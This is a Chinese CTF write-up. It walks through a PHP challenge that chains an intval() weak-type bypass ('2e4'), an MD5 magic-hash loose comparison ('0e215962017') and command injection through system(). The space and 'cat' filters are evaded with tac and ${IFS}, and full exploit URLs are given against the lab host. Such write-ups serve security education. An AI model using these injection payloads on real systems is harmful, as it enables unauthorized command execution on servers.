本文详细解析了一个涉及PHP弱类型、MD5双加密及命令执行的CTF挑战。通过GET参数,利用intval()函数的弱类型特性绕过条件判断,以及MD5的0E开头特殊值进行双加密匹配。最终,通过构造特定的payload绕过过滤,实现命令执行,成功获取flag。文章还提供了PHP代码中常见的弱类型问题的介绍链接。
审题
查看乱码
提示bot
猜测robots.txt
提示fAke_f1agggg.php
打开发现不是flag
抓包
提示fl4g.php
得到乱码,设置网页为unicode编码后得到源码
intval() php弱类型
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
}else{
die("金钱解决不了穷人的本质问题");
}
}else{
die("去非洲吧");
}
用get方法传入一个num
如果num取整小于2020且num+1取整大于2021则通过
<?php
$a="2e4";
echo(intval($a));
//此处把$a当成一个字符串处理,返回第一个数字到最后一个数字为止。
echo("<br>");
echo(intval($a+1));
//此处由于$a+1参与了数值运算所以php把$a解释称数字,由于科学计数法$a=20000
2
20001
md5弱类型 双md5
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
else
die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
die("去非洲吧");
}
通过get方法传入$md5
如果$md5的值和md5加密后的$md5相等则通过
这里也是弱类型
找到一个数其一次md5和两次md5加密后的值都是0E开头,在比较时都会被视为0
md5(“V5VDSHva7fjyJoJ33IQl”) => 0e18bb6e1d5c2e19b63898aeed6b37ea
md5(“0e18bb6e1************”) => 0e0a710a092113dd5ec9dd47d4d7b86f
为啥不行??????
明明符合可是就是不行
查payload用的是0e215962017试了下可以
命令执行
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
system($get_flag);
}else{
die("快到非洲了");
}
}else{
die("去非洲吧");
}
?>
去非洲吧
过滤了cat和空格
用tac和${IFS}绕过
payload
首先linux查看文件ls
http://17335974-33a7-4e7e-9070-821b0e88b887.node4.buuoj.cn:81/fl4g.php?num=2e4&md5=0e215962017&get_flag=ls
查看疑似flag的文件
http://17335974-33a7-4e7e-9070-821b0e88b887.node4.buuoj.cn:81/fl4g.php?num=2e4&md5=0e215962017&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
附上大佬写的php代码常见弱类型的文章
https://mingxin.live/article/php%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E%E5%87%BD%E6%95%B0%E4%BB%8B%E7%BB%8D/
扫一扫
843
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
